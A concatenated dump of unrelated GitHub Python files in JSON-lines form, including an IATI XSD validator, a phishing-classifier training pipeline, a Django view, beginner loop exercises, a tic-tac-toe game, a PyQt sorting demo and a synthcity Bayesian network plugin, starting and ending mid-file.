data, ' + \\\n 'but is not valid: \"{url}\".'\n self.details = details.format(url=value)\n\n\nclass XSDNameTokenTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDNameTokenTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n attr = self._get_attribute()\n\n # https://www.w3.org/TR/xmlschema-2/#NMTOKEN\n self.summary = 'An invalid reference to another IATI ' + \\\n 'element is used.'\n details = 'This is a bit unusual... The '\n if attr is not None:\n details += '\"{attr_name}\" attribute of the '\n\n details += '\"{el_name}\" element must reference another ' + \\\n ' IATI element.'\n\n if value is not None:\n details += ' However, the value provided (\"{value}\") ' + \\\n 'is not a valid IATI element name.'\n self.details = details.format(el_name=self._get_element(),\n attr_name=attr, value=value)\n\n\nclass XSDTextNotAllowedError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDTextNotAllowedError, self).__init__(error, filetype, version)\n\n self.summary = 'Text found where there shouldn\\'t be any.'\n details = 'The \"{el_name}\" element is not allowed to contain ' + \\\n 'any text. Either this text was added in error, or' + \\\n 'should be included in an attribute or a ' + \\\n 'child element.'\n self.details = details.format(el_name=self._get_element())\n\n\nclass XSDUnknownAttributeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDUnknownAttributeError, self).__init__(\n error, filetype, version)\n\n self.summary = 'An incorrect attribute is present.'\n details = 'The \"{el_name}\" element includes an attribute ' + \\\n '\"{attr_name}\". This attribute should not be ' + \\\n 'present here.'\n self.details = details.format(el_name=self._get_element(),\n attr_name=self._get_attribute())\n\n\nclass XSDMissingAttributeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDMissingAttributeError, self).__init__(\n error, filetype, version)\n\n self.summary = 'A required attribute is missing.'\n details = 'The \"{el_name}\" element must include a ' + \\\n '\"{attr_name}\" attribute. This is missing.'\n self.details = details.format(el_name=self._get_element(),\n attr_name=self._get_attribute())\n\n\nclass XSDUnexpectedElementError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDUnexpectedElementError, self).__init__(\n error, filetype, version)\n\n self.summary = 'An unexpected element was found.'\n expected = self._get_expecteds()\n if expected == []:\n expected_str = 'a different element'\n elif len(expected) == 1:\n expected_str = '\"{}\"'.format(expected[0])\n elif len(expected) == 2:\n expected_str = 'either \"{}\" or \"{}\"'.format(*expected)\n else:\n expected_str = 'one of \"{}\" or \"{}\"'.format(\n '\", \"'.join(expected[:-1]), expected[-1])\n\n if version.startswith('2'):\n details = 'In IATI v{version}, the order of elements ' + \\\n 'is important. It looks like that might be ' + \\\n 'the problem here. Specifically, ' + \\\n '\"{el_name}\" is present, but ' + \\\n '{expected} is expected.'\n else:\n details = 'The element \"{el_name}\" is present, but ' + \\\n '{expected} is expected.'\n self.details = details.format(version=version,\n expected=expected_str,\n el_name=self._get_element())\n\n\nclass XSDMissingElementError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDMissingElementError, self).__init__(error, filetype, version)\n\n expected = self._get_expecteds()\n if expected == []:\n expected_str = 'a different element'\n elif len(expected) == 1:\n expected_str = '\"{}\"'.format(expected[0])\n else:\n expected_str = '\"{}\" and \"{}\"'.format(\n '\", \"'.join(expected[:-1]), expected[-1])\n\n if len(expected) > 1:\n self.summary = 'Some required elements are missing.'\n details = 'The \"{el_name}\" element expects some child ' + \\\n 'elements, but these are missing. ' + \\\n 'Specifically, {expected} are missing ' + \\\n 'but should be present.'\n else:\n self.summary = 'A required element is missing.'\n details = 'The \"{el_name}\" element expects a child ' + \\\n 'element, but this is missing. ' + \\\n 'Specifically, {expected} is missing ' + \\\n 'but should be present.'\n self.details = details.format(expected=expected_str,\n el_name=self._get_element())\n\n\nclass XSDBadRootNodeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDBadRootNodeError, self).__init__(error, filetype, version)\n\n el_name = self._get_element()\n\n self.summary = 'This doesn\\'t look like an IATI XML dataset.'\n if 'microsoft.com' in el_name:\n details = 'It looks like this might be a Microsoft Office ' + \\\n 'file, rather than an IATI XML dataset.'\n self.path = None\n else:\n details = 'The root node of the dataset should be either ' + \\\n '\"iati-organisations\" or \"iati-activities\". ' + \\\n 'In this case, it is \"{el_name}\". That\\'s a problem.'\n self.details = details.format(el_name=el_name)\n\n\nclass XSDValidator(Validator):\n def __init__(self, is_valid, errors, filetype, version):\n super(XSDValidator, self).__init__(is_valid, errors)\n\n self.filetype = filetype\n self.version = version\n\n @staticmethod\n def _get_error_class(ref, message):\n err_class = {\n 1843: XSDTextNotAllowedError,\n 1866: XSDUnknownAttributeError,\n 1867: XSDUnknownAttributeError,\n 1868: XSDMissingAttributeError,\n 1845: XSDBadRootNodeError,\n }.get(ref)\n\n if not err_class:\n if ref == 1871:\n if 'This element is not expected.' in message:\n err_class = XSDUnexpectedElementError\n elif 'Missing child element(s)' in message:\n err_class = XSDMissingElementError\n elif ref == 1824:\n if 'atomic type \\'xs:decimal\\'' in message:\n err_class = XSDDecimalTypeError\n elif 'atomic type \\'xs:dateTime\\'' in message:\n err_class = XSDDateTimeTypeError\n elif 'atomic type \\'xs:date\\'' in message:\n err_class = XSDDateTypeError\n elif 'atomic type \\'xs:boolean\\'' in message:\n err_class = XSDBooleanTypeError\n elif 'atomic type \\'xs:anyURI\\'' in message:\n err_class = XSDURITypeError\n elif 'atomic type \\'xs:NMTOKEN\\'' in message:\n err_class = XSDNameTokenTypeError\n\n if not err_class:\n # Default: unknown schema error\n err_class = XSDValidationError\n\n return err_class\n\n @property\n def errors(self):\n error_list = []\n for error in self._errors:\n xsd_error_class = self._get_error_class(error.type,\n error.message)\n xsd_error = xsd_error_class(error, self.filetype,\n self.version)\n error_list.append(xsd_error)\n return error_list\n\n @property\n def error_summary(self):\n error_dict = {}\n for error in self._errors:\n xsd_error_class = self._get_error_class(error.type,\n error.message)\n error_type = xsd_error_class.__name__\n if error_type not in error_dict:\n xsd_error = xsd_error_class(error, self.filetype,\n self.version)\n error_dict[error_type] = [xsd_error, 1]\n else:\n error_dict[error_type][1] += 1\n return list(error_dict.values())\n\n\nclass XSDSchema(object):\n def __init__(self, filetype, version):\n self.filetype = filetype\n self.version = version\n\n schema = {\n 'activity': 'iati-activities-schema.xsd',\n 'organisation': 'iati-organisations-schema.xsd',\n }.get(filetype)\n\n if filetype is None:\n msg = 'Couldn\\'t discern the filetype (activity or ' + \\\n 'organisation) for this dataset, so couldn\\'t ' + \\\n 'construct a schema.'\n raise SchemaNotFoundError(msg)\n elif schema is None:\n msg = 'Invalid filetype \"{filetype}\" was provided, ' + \\\n 'so couldn\\'t construct a schema.'\n msg = msg.format(filetype=filetype)\n raise SchemaNotFoundError(msg)\n elif version is None:\n msg = 'No version was provided, ' + \\\n 'so couldn\\'t construct a schema.'\n raise SchemaNotFoundError(msg)\n\n self.schema_path = join(CONFIG['paths']['standard'], 'schemas',\n version.replace('.', ''), schema)\n\n if not exists(self.schema_path):\n msg = 'No {filetype} schema found for IATI version \"{version}\".'\n msg = msg.format(filetype=filetype, version=version)\n raise SchemaNotFoundError(msg)\n\n def __repr__(self):\n return '<{} ({} {})>'.format(self.__class__.__name__,\n self.filetype, self.version)\n\n def validate(self, etree):\n schema = ET.XMLSchema(ET.parse(self.schema_path))\n is_valid = schema.validate(etree)\n return XSDValidator(is_valid, schema.error_log,\n self.filetype, self.version)\n","repo_name":"codeforIATI/iatikit","sub_path":"iatikit/standard/xsd_schema.py","file_name":"xsd_schema.py","file_ext":"py","file_size_in_byte":17111,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"18984096043","text":"import sys\nimport os\n\nfrom phising.components.data_ingestion import DataIngestion\nfrom phising.components.data_transformation import DataTransformation\nfrom phising.components.data_validation import DataValidation\nfrom phising.components.model_evaluation import ModelEvaluation\nfrom phising.components.model_pusher import ModelPusher\nfrom phising.components.model_trainer import ModelTrainer\nfrom phising.entity.artifact_entity import (\n DataIngestionArtifact,\n DataTransformationArtifact,\n DataValidationArtifact,\n ModelEvaluationArtifact,\n ModelPusherArtifact,\n ModelTrainerArtifact,\n)\nfrom phising.entity.config_entity import (\n DataIngestionConfig,\n DataTransformationConfig,\n DataValidationConfig,\n ModelEvaluationConfig,\n ModelPusherConfig,\n ModelTrainerConfig,\n TrainingPipelineConfig,\n)\nfrom phising.exception import PhisingException\n\n\nclass TrainPipeline:\n is_pipeline_running = False\n\n def __init__(self):\n self.training_pipeline_config: TrainingPipelineConfig = TrainingPipelineConfig()\n\n def start_data_ingestion(self) -> DataIngestionArtifact:\n try:\n self.data_ingestion_config: DataIngestionConfig = DataIngestionConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n data_ingestion: DataIngestion = DataIngestion(\n data_ingestion_config=self.data_ingestion_config\n )\n\n data_ingestion_artifact: DataIngestionArtifact = (\n data_ingestion.initiate_data_ingestion()\n )\n\n return data_ingestion_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_data_validation(\n self, data_ingestion_artifact: DataIngestionArtifact\n ) -> DataValidationArtifact:\n try:\n self.data_validation_config: DataValidationConfig = DataValidationConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n data_validation: DataValidation = DataValidation(\n data_ingestion_artifact=data_ingestion_artifact,\n data_validation_config=self.data_validation_config,\n )\n\n data_validation_artifact: DataValidationArtifact = (\n data_validation.initiate_data_validation()\n )\n\n return data_validation_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_data_transformation(\n self, data_validation_artifact: DataValidationArtifact\n ) -> DataTransformationArtifact:\n try:\n self.data_transformation_config: DataTransformationConfig = (\n DataTransformationConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n )\n\n data_transformation: DataTransformation = DataTransformation(\n data_validation_artifact=data_validation_artifact,\n data_transformation_config=self.data_transformation_config,\n )\n\n data_transformation_artifact: DataTransformationArtifact = (\n data_transformation.initiate_data_transformation()\n )\n\n return data_transformation_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_model_trainer(\n self, data_transformation_artifact: DataTransformationArtifact\n ) -> ModelTrainerArtifact:\n try:\n self.model_trainer_config: ModelTrainerConfig = ModelTrainerConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n model_trainer = ModelTrainer(\n data_transformation_artifact=data_transformation_artifact,\n model_trainer_config=self.model_trainer_config,\n )\n\n model_trainer_artifact = model_trainer.initiate_model_trainer()\n\n return model_trainer_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_model_evaluation(\n self,\n data_validation_artifact: DataValidationArtifact,\n model_trainer_artifact: ModelTrainerArtifact,\n ) -> ModelEvaluationArtifact:\n try:\n self.model_eval_config: ModelEvaluationConfig = ModelEvaluationConfig()\n\n model_evaluation = ModelEvaluation(\n model_eval_config=self.model_eval_config,\n data_validation_artifact=data_validation_artifact,\n model_trainer_artifact=model_trainer_artifact,\n )\n\n model_evaluation_artifact = model_evaluation.initiate_model_evaluation()\n\n return model_evaluation_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_model_pusher(self, model_evaluation_artifact: ModelEvaluationArtifact):\n try:\n self.model_pusher_config: ModelPusherConfig = ModelPusherConfig()\n\n model_pusher = ModelPusher(\n model_evaluation_artifact=model_evaluation_artifact,\n model_pusher_config=self.model_pusher_config,\n )\n\n model_pusher_artifact = model_pusher.initiate_model_pusher()\n\n return model_pusher_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def run_pipeline(self):\n try:\n TrainPipeline.is_pipeline_running = True\n\n data_ingestion_artifact: DataIngestionArtifact = self.start_data_ingestion()\n\n data_validation_artifact: DataValidationArtifact = (\n self.start_data_validation(\n data_ingestion_artifact=data_ingestion_artifact\n )\n )\n\n data_transformation_artifact: DataTransformationArtifact = (\n self.start_data_transformation(\n data_validation_artifact=data_validation_artifact\n )\n )\n\n model_trainer_artifact: ModelTrainerArtifact = self.start_model_trainer(\n data_transformation_artifact=data_transformation_artifact\n )\n\n model_evaluation_artifact: ModelEvaluationArtifact = (\n self.start_model_evaluation(\n data_validation_artifact=data_validation_artifact,\n model_trainer_artifact=model_trainer_artifact,\n )\n )\n\n model_pusher_artifact: ModelPusherArtifact = self.start_model_pusher(\n model_evaluation_artifact=model_evaluation_artifact\n )\n\n except Exception as e:\n raise PhisingException(e, sys)\n","repo_name":"sethusaim/phising-classifaction","sub_path":"phising/pipeline/training_pipeline.py","file_name":"training_pipeline.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"39318225575","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Teacher\nfrom django.utils.crypto import get_random_string\n\n\n# Create your views here.\ndef view_teachers(request, pk=None) -> render:\n if 'create' in request.path:\n kravtz = Teacher.objects.filter(first_name='Кравец')\n if not kravtz:\n Teacher.objects.create(first_name='Кравец',\n second_name='Боб',\n birth_day='2000-12-15',\n email='bob@kravetx.eau',\n phone='+998901002030'\n )\n else:\n teacher_tmp = Teacher.objects.filter(first_name='Кравец').first()\n teacher_tmp.second_name = get_random_string(length=10, allowed_chars='АБВГДЕЁЖЗИКЛМНОПРСТУФХЧШЩЭЮЯ')\n teacher_tmp.email = get_random_string(length=6,\n allowed_chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789') + '@kravetz.eau'\n teacher_tmp.phone = '+' + get_random_string(length=13, allowed_chars='0123456789')\n teacher_tmp.save()\n\n if not pk:\n template_ = 'teachers.html'\n teachers = Teacher.objects.all()\n context = {\n 'teachers': teachers\n }\n else:\n current_teacher = get_object_or_404(Teacher, pk=pk)\n teachers = Teacher.objects.all()\n template_ = 'teacher_detail.html'\n context = {\n 'teachers': teachers,\n 'current_teacher': current_teacher\n }\n\n return render(request=request, template_name=template_, context=context)\n","repo_name":"pushinm/django_hw_9","sub_path":"another_classboard/teachers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5197544767","text":"'''\nFunção while em Python - Aula 7\nUtilizado para realizar ações enquanto uma condição\nfor verdadeira.\n\n'''\n\nx = 0\nwhile x < 11:\n print(x)\n x = x + 1\n\nprint('Acabou')\n\n# Exemplo da função continue, ela faz com que a linha seguinte não seja mais executada.\n\nx = 0\nwhile x < 10:\n if x == 3:\n x = x + 1 # Temos que repetir função que tinha abaixo pois apos o continue\n continue # ela não sera mais executada, e vai pular o numero 3 da lista.\n\n print(x)\n x = x + 1\n\nprint('Acabou')\n\n# Similar ao continue temos a break, ele finaliza a execução e pula para o final.\n\nx = 0\nwhile x < 10:\n if x == 3:\n x = x + 1\n break\n\n print(x)\n x = x + 1\n\nprint('Acabou')\n\nprint()\n\nx = 0 # coluna\n\nwhile x < 10:\n y = 0 # linha\n while y < 5:\n print(f'X vale {x} e Y vale {y}')\n y += 1 # y = y + 1\n\n x += 1 # x = x + 1\n\nprint('Acabou!!')\n\nprint()\n\nwhile True:\n print()\n num1 = input('Digite um numero: ')\n operador = input('Digite o operador: ')\n num2 = input('Digite outro numero: ')\n sair = input('Deseja sair? [s]im ou [n]ão? ')\n\n if not num1.isnumeric() or not num2.isnumeric():\n print('Voce precisa digitar um numero.')\n continue\n\n num1 = int(num1)\n num2 = int(num2)\n\n if operador == '+':\n print(num1 + num2)\n elif operador == '-':\n print(num1 - num2)\n elif operador == '*':\n print(num1 * num2)\n elif operador == '/':\n print(num1 / num2)\n else:\n print('Impossivel de calcular.')\n\n if sair == 's':\n break\n","repo_name":"kamui-7/Curso-Python","sub_path":"Modulo 1 - Basico/Aula 7.py","file_name":"Aula 7.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72573488570","text":"#!/usr/bin/env python\n\nimport logging, var\nfrom logging import handlers\n\ndebug, info, warning, error, critical = None, None, None, None, None\n\ndef _getlevel(var):\n if var.Configuration['loglevel'] == 'info':\n return logging.INFO\n elif var.Configuration['loglevel'] == 'warning':\n return logging.WARNING\n elif var.Configuration['loglevel'] == 'debug':\n return logging.DEBUG\n elif var.Configuration['loglevel'] == 'error':\n return logging.ERROR\n elif var.Configuration['loglevel'] == 'critical':\n return logging.CRITICAL\n return logging.INFO\ndef init():\n global debug, info, warning, error, critical\n var.log = logging.getLogger('labere')\n if var.Configuration['fork'] == 'False':\n stream = logging.StreamHandler()\n else:\n stream = None\n handler = handlers.RotatingFileHandler(filename=var.Configuration['logfile'], maxBytes=10000, backupCount=5)\n formatter = logging.Formatter('[%(asctime)s] -- %(levelname)s -- %(message)s')\n handler.setFormatter(formatter)\n if stream:\n stream_formatter = logging.Formatter('%(levelname)s: %(message)s')\n stream.setFormatter(stream_formatter)\n var.log.addHandler(stream)\n var.log.addHandler(handler)\n var.log.setLevel(_getlevel(var))\n debug, info, warning = var.log.debug, var.log.info, var.log.warning\n error, critical = var.log.error, var.log.critical","repo_name":"alyx/labere","sub_path":"core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10390382587","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: This script runs reads the files test.JSON and train.JSON picks the image path\nand co-ordinates, crops the cell images and saves it to the category folders \naccordingly.\n\n@author: jaydeep\n\"\"\"\nimport os\nimport pandas as pd\nimport cv2\nfrom pathlib import Path\n\n# Dataset path\ndataset_path = Path(r'E:\\Class_Notes_Sem2\\ADM\\Project\\malaria-bounding-boxes\\malaria')\n\ndef main():\n # Dataframe to store to serialise JSON\n dataset_df = {}\n # Read the JSON contents to the dataframe\n for p,f,files in os.walk(dataset_path):\n for file in files:\n if file.endswith('json'):\n dataset_df[file.strip('.json')] = pd.read_json(os.path.join(p, file))\n \n # Extract the path, objects and categories if the images\n object_df = {}\n for types in dataset_df.keys():\n # Retrieve the pathnames\n dataset_df[types]['path'] = dataset_df[types]['image'].map(lambda x: dataset_path / x['pathname'][1:])\n # Check for image existence\n dataset_df[types]['image_exists'] = dataset_df[types]['path'].map(lambda x: x.exists())\n # For each image store paths and objects\n object_df[types] = pd.DataFrame([dict(image=c_row['path'], **c_item) \\\n for _, c_row in dataset_df[types].iterrows() for c_item in c_row['objects']])\n \n # Create a folder for each category\n try:\n for types in object_df.keys():\n for category in (object_df[types]['category']).unique():\n os.mkdir(dataset_path / category)\n except:\n print(\"Folder already exists\")\n \n # Crop out the images using the co-ordinates\n for types in object_df.keys():\n count = 1\n # Iter through each row of the dataframe\n for index, row in object_df[types].iterrows():\n # Get the path\n path = row['image']\n # Read the image\n im = cv2.imread(str(path))\n # Get the category to store the cropped image later to folder\n category = row['category']\n # Get the lower left coordinates\n min_val = row['bounding_box']['minimum']\n # Get the upper right coordinates\n max_val = row['bounding_box']['maximum']\n # Crop Image\n crop_img = im[min_val['r']:max_val['r'], min_val['c']:max_val['c']]\n # Write to the folder\n cv2.imwrite(r\"E:\\Class_Notes_Sem2\\ADM\\Project\\malaria-bounding-boxes\\malaria\\{}\\{}.jpg\".format(category, count), crop_img)\n cv2.waitKey(2)\n count+=1\n print(\"Cropping done, {} images cropped\".format(count))\n return\n\nif __name__== '__main__':\n main()","repo_name":"jaydeepdeka/malaria_level_detection","sub_path":"crop_utils.py","file_name":"crop_utils.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36211668309","text":"import random\n\ndef main():\n\t\"\"\"Begins a game of tic-tac-toe.\"\"\"\n\tGame = TicTacToe()\n\tprint(\"Welcome to Tic-Tac-Toe\")\n\twhile True:\n\t\tprint(\"Player%d, take your move.\" % Game.turn)\n\t\trow = int(input(\"Enter row of move... \"))\n\t\tcol = int(input(\"Enter col of move... \"))\n\t\tGame.move(Game.turn, row, col)\n\t\tGame.printBoard()\n\t\tif Game.win:\n\t\t\trestart = int(input(\"Enter 1 to restart the game, 0 to end game... \"))\n\t\t\tif restart == 1:\n\t\t\t\tGame.restartGame()\n\t\t\telse:\n\t\t\t\tprint(\"Closing Tic-Tac-Toe Game...\")\n\t\t\t\treturn\n\nclass TicTacToe():\n\t\"\"\"A tic-tac-toe game. \n\n\tTwo players take turns specifying the row and column to make\n\ttheir next move. When a player wins, they can either exit or restart.\n\n\tAttributes\n\t----------\n\tstate: 3x3 integer array\n\t\tCurrent state of the game where 0 is empty, 1 for X, and 2 for O.\n\tturn: integer\n\t\tRepresents whos turn it currently is. 1 for X and 2 for O.\n\twin: integer\n\t\t0 if there is no current winner. 1 if X wins, 2 if O wins.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.state = [[0 for x in range(3)] for y in range(3)]\n\t\tself.turn = self.whoGoesFirst()\n\t\tself.win = 0\n\n\tdef changeTurn(self):\n\t\t\"\"\"Flips who turn it is in this game.\"\"\"\n\t\tif self.turn == 1:\n\t\t\tself.turn = 2\n\t\telse:\n\t\t\tself.turn = 1\n\n\tdef move(self, player, row, col):\n\t\t\"\"\"Moves the player at the given row and col in the board.\n\n\t\tIf that position has already been taken, will alert player and \n\t\tit will still be their turn.\n\t\t\"\"\"\n\t\tif player != self.turn: # not this player's turn\n\t\t\tprint(\"Oops! It is not your turn, Player%d\" % player)\n\t\t\treturn\n\t\tif self.state[row][col]: # already a move in this position\n\t\t\tprint(\"Oops! It seems that someone has already moved here, Player%d\" % player)\n\t\t\treturn\n\t\telse: # empty spot\n\t\t\tself.state[row][col] = player\n\t\t\tself.checkForWin(self.state, player)\n\t\t\tself.changeTurn()\n\n\tdef checkForWin(self, board, player):\n\t\t\"\"\"Checks all possibilities for player to win.\"\"\"\n\t\tif ((board[0][0] == player and board[0][1] == player and board[0][2] == player) or\n\t\t\t(board[1][0] == player and board[1][1] == player and board[1][2] == player) or\n\t\t\t(board[2][0] == player and board[2][1] == player and board[2][2] == player) or\n\t\t\t(board[0][0] == player and board[1][1] == player and board[2][2] == player) or\n\t\t\t(board[0][2] == player and board[1][1] == player and board[2][0] == player) or\n\t\t\t(board[0][0] == player and board[1][0] == player and board[2][0] == player) or\n\t\t\t(board[0][1] == player and board[1][1] == player and board[2][1] == player) or\n\t\t\t(board[0][2] == player and board[1][2] == player and board[2][2] == player)):\n\t\t\tprint(\"----------------------------\")\n\t\t\tprint(\"Yay! Player%d is the winner!\" % player)\n\t\t\tprint(\"----------------------------\")\n\t\t\tself.win = player\n\n\tdef whoGoesFirst(self):\n\t\t\"\"\"Assigns what player goes first in this game.\n\n\t\tRandomly chooses either 1 or 2, representing which player.\n\t\t\"\"\"\n\t\treturn random.randint(1, 2)\n\n\tdef restartGame(self):\n\t\t\"\"\"Restarts this game's values to a new game.\"\"\"\n\t\tself.state = [[0 for x in range(3)] for y in range(3)]\n\t\tself.turn = self.whoGoesFirst()\n\t\tself.win = 0\n\n\tdef printBoard(self):\n\t\t\"\"\"Prints the current state of the tic-tac-toe board.\"\"\"\n\t\tkey = [' ', 'X', 'O']\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[0][0]] + ' | ' + key[self.state[0][1]] + ' | ' + key[self.state[0][2]])\n\t\tprint(' | |')\n\t\tprint('-----------')\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[1][0]] + ' | ' + key[self.state[1][1]] + ' | ' + key[self.state[1][2]])\n\t\tprint(' | |')\n\t\tprint('-----------')\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[2][0]] + ' | ' + key[self.state[2][1]] + ' | ' + key[self.state[2][2]])\n\t\tprint(' | |')\n\nif __name__ == \"__main__\":\n\tmain()\t\t","repo_name":"derrowap/MA490-MachineLearning-FinalProject","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72703274810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 开发团队 : Sunniwell\n# 开发人员 : chengc\n# 开发时间 : 2021/6/24 14:57\n# 文件名称 : ColumnSort.py\n# 开发工具 : PyCharm\n\n\"\"\"\n按照某一列数据排序\n\"\"\"\n\nimport sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\nclass ColumnSortDemo(QWidget):\n def __init__(self):\n super(ColumnSortDemo, self).__init__()\n self.setWindowTitle('数据排序')\n self.resize(400, 200)\n\n self.sortType = Qt.AscendingOrder\n self.tableWidget = QTableWidget(4, 3)\n self.tableWidget.setHorizontalHeaderLabels(['姓名', '性别', '体重(KG)'])\n\n listData = [['刘亦菲', '女', '45'],\n ['刘诗诗', '女', '44'],\n ['迪丽热巴', '女', '50'],\n ['古力娜扎', '女', '48']]\n\n for i in range(len(listData)):\n for j in range(len(listData[i])):\n self.tableWidget.setItem(i, j, QTableWidgetItem(listData[i][j]))\n\n sortButton = QPushButton('按体重排序')\n sortButton.clicked.connect(self.sortTable)\n\n layout = QVBoxLayout()\n layout.addWidget(self.tableWidget)\n layout.addWidget(sortButton)\n self.setLayout(layout)\n\n def sortTable(self):\n if self.sortType == Qt.AscendingOrder:\n self.sortType = Qt.DescendingOrder\n else:\n self.sortType = Qt.AscendingOrder\n\n self.tableWidget.sortItems(2, self.sortType)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mainWin = ColumnSortDemo()\n mainWin.show()\n sys.exit(app.exec_())\n","repo_name":"QCZL/PyQt5","sub_path":"TableAndTree/ColumnSort.py","file_name":"ColumnSort.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29414568359","text":"import math\ndef area_triangulo(base,altura):\n area=(base*altura)/2\n return area\n\ndef area_rectangulo(base,altura):\n area=base*altura\n return area\n\ndef area_rombo(diagonal1,diagonal2):\n area=(diagonal1*diagonal2)/2\n return area\n\ndef area_circulo(radio):\n area=math.pi*radio**2\n return area\n\ndef menu_figuras():\n a=input(\"Ingrese el área que desea calcular (triangulo,rectangulo,rombo o circulo: \")\n a=a.lower()\n if a==\"triangulo\":\n b=int(input(\"Ingrese base: \"))\n h=int(input(\"Ingrese altura: \"))\n return area_triangulo(b,h)\n elif a==\"rectangulo\":\n b=int(input(\"Ingrese base: \"))\n h=int(input(\"Ingrese altura: \"))\n return area_rectangulo(b,h)\n elif a==\"rombo\":\n b=int(input(\"Ingrese una diagonal: \"))\n h=int(input(\"Ingrese la otra diagonal: \"))\n return area_rombo(b,h)\n elif a==\"circulo\":\n r=int(input(\"Ingrese radio: \"))\n return area_circulo(r)\n\nif __name__ == \"__main__\":\n pass\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej1/tema2_ej1_9b7f534138276dc3088f06c18305e3a4.py","file_name":"tema2_ej1_9b7f534138276dc3088f06c18305e3a4.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19551817811","text":"\"\"\"Bayesian Network for generative modeling. Implemented using pgmpy backend.\n\nReference: JAnkan, Ankur and Panda, Abinash,\n\"pgmpy: Probabilistic graphical models using python,\"\nProceedings of the 14th Python in Science Conference (SCIPY 2015), 2015.\n\"\"\"\n\n# stdlib\nfrom typing import Any, List\n\n# third party\nimport numpy as np\nimport pandas as pd\nimport pgmpy.estimators as estimators\nfrom pgmpy.models import BayesianNetwork\nfrom pgmpy.sampling import BayesianModelSampling\n\n# synthcity absolute\nfrom synthcity.plugins.core.dataloader import DataLoader\nfrom synthcity.plugins.core.distribution import CategoricalDistribution, Distribution\nfrom synthcity.plugins.core.models.tabular_encoder import TabularEncoder\nfrom synthcity.plugins.core.plugin import Plugin\nfrom synthcity.plugins.core.schema import Schema\n\n\nclass BayesianNetworkPlugin(Plugin):\n \"\"\"BayesianNetwork plugin.\n\n Example:\n >>> from synthcity.plugins import Plugins\n >>> plugin = Plugins().get(\"bayesian_network\")\n >>> from sklearn.datasets import load_iris\n >>> X = load_iris()\n >>> plugin.fit(X)\n >>> plugin.generate()\n \"\"\"\n\n def __init__(\n self,\n struct_learning_n_iter: int = 1000,\n struct_learning_search_method: str = \"tree_search\", # hillclimb, pc, tree_search, mmhc, exhaustive\n struct_learning_score: str = \"k2\", # k2, bdeu, bic, bds\n struct_max_indegree: int = 4,\n encoder_max_clusters: int = 10,\n encoder_noise_scale: float = 0.1,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n\n self.struct_learning_n_iter = struct_learning_n_iter\n self.struct_learning_search_method = struct_learning_search_method\n self.struct_learning_score = struct_learning_score\n self.struct_max_indegree = struct_max_indegree\n\n self.encoder = TabularEncoder(max_clusters=encoder_max_clusters)\n self.encoder_noise_scale = encoder_noise_scale\n\n @staticmethod\n def name() -> str:\n return \"bayesian_network\"\n\n @staticmethod\n def type() -> str:\n return \"generic\"\n\n @staticmethod\n def hyperparameter_space(**kwargs: Any) -> List[Distribution]:\n return [\n CategoricalDistribution(\n name=\"struct_learning_search_method\",\n choices=[\"hillclimb\", \"pc\", \"tree_search\"],\n ),\n CategoricalDistribution(\n name=\"struct_learning_score\", choices=[\"k2\", \"bdeu\", \"bic\", \"bds\"]\n ),\n ]\n\n def _encode_decode(self, data: pd.DataFrame) -> pd.DataFrame:\n encoded = self.encoder.transform(data)\n\n # add noise to the mixture means, but keep the continuous cluster\n noise = np.random.normal(\n loc=0, scale=self.encoder_noise_scale, size=len(encoded)\n )\n for col in encoded.columns:\n if col.endswith(\".normalized\"):\n encoded[col] += 